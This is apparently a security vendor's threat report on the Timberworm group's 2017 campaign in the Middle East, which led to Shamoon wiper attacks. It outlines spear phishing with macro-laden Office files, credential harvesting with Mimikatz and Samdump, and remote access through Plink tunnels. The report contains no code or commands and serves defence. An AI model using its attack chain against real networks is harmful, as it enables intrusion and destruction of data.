Recent attacks involving the destructive malware Shamoon (W32.Disttrack.B) were launched by attackers conducting a much wider campaign in the Middle East. While the attackers have compromised multiple targets in the region, only selected targets in Saudi Arabia were infected with Shamoon.
On February 15, publications from IBM (The Full Shamoon) and Palo Alto (Magic Hound) separately discussed a persistent attack campaign operating primarily in the Middle East with links to Shamoon. This campaign was conducted by a group we identify as Timberworm. The group appears to have facilitated the third wave of destructive attacks involving Shamoon in January 2017. Timberworm operates in the Middle East and beyond. Only specific organizations affiliated with Saudi Arabia appear to have been earmarked for destructive wiping attacks.
During the January attacks, Symantec discovered a high correlation between Timberworm and the presence of Shamoon in a number of organizations in Saudi Arabia. Timberworm appears to have gained access to these organizations’ networks weeks and, in some cases, months before the Shamoon attacks occurred. Once on the network, the attackers' primary goal appeared to be similar to Greenbug (an actor previously discussed in relation to the November 17 wave of attacks): detailed network reconnaissance, credential harvesting, and persistent remote access.
When Timberworm had sufficient access to a number of high value organizations, Shamoon was then preconfigured with a wipe date and the necessary credentials to maximize the overall impact during a coordinated attack. This procedure is consistent with what was observed during Greenbug operations prior to the November 17 attacks, which may indicate that multiple groups are cooperating to facilitate these destructive attacks, possibly at the direction of a single entity.
Stage 1: Timberworm recon
Timberworm’s carefully planned operation saw the attackers send spear phishing emails to individuals at targeted organizations. In some cases, the emails contained Microsoft Word or Excel files as attachments. In others, the emails contained malicious links, which if clicked, downloaded similar Word or Excel files.
Computer network exploitation
Opening the document invoked PowerShell from a malicious macro, which provided the attackers with remote access to the compromised computer. Some basic reconnaissance was then performed using existing system tools to determine if the target was of interest. Once Timberworm was satisfied, it then deployed custom malware, hacktools, and software traditionally used in system/network administration. Some of the tools deployed during these attacks included:
- PsExec, a tool for executing processes on other systems from Microsoft Sysinternals
- PAExec, a free re-implementation of PsExec from Poweradmin
- Netscan, a multipurpose IPv4/IPv6 network scanner
- Samdump, a hacking tool that dumps Windows password hashes
- Mimikatz (Hacktool.Mimikatz), a hacking tool to harvest credentials
- TightVNC, an open-source remote desktop access application
- Plink, a command line network connection tool supporting encrypted communications
- Rar, archiving utility for compressing files before ex-filtration.
During this phase, once the attacker appeared to have achieved the desired level of network access, Plink was executed to provide an additional avenue of remote access (Fex reverse RDP over SSH connections). This pattern of activity is also consistent with what was observed during Greenbug operations in 2016, before the eventual deployment of Shamoon.
Stage 2: Shamoon destruction
At this point the attackers configured the Shamoon payloads per organization and then coordinated the attacks on a pre-determined date. In the January 23 attacks Symantec observed consistent usage of PAExec across numerous organizations to initially deploy W32.Disttrack.B. After it was deployed, it would self-propagate and wipe accessible computers across the network.
Multiple teams cooperating?
Timberworm appears to be a much larger operation, infiltrating a much broader range of organizations beyond those affected by the recent Shamoon attacks. Similarly, Greenbug targeted a range of organizations in the Middle East beyond those affected by Shamoon, including companies in the aviation, energy, government, investment, and education sectors. While both groups leveraged two distinct toolsets, their targets, tactics, and procedures align very well and in close proximity to the coordinated wiping events.
“Living off the land”
The Shamoon attacks illustrate how a growing number of targeted attack groups are relying on common-off-the-shelf tools to compromise targets. The Shamoon attackers managed to get access to targets’ networks using socially engineered spear-phishing emails and abusing Office macros and PowerShell to gain initial footholds. In particular, the use of PowerShell has been a popular tactic of late. Recent Symantec research found a total of 111 malware families that use the PowerShell command line. More than 95 percent of the PowerShell scripts analyzed through the BlueCoat Malware Analysis sandbox were found to be malicious.
The appeal of “living off the land” is obvious. Attackers believe malicious activity will be more difficult to detect if legitimate tools are involved and malware use is kept to a minimum. The use of legitimate tools may also serve to thwart attribution to specific actors.
Symantec and Norton products protect against Shamoon with the following detections:
Intrusion prevention system:
Indicators of compromise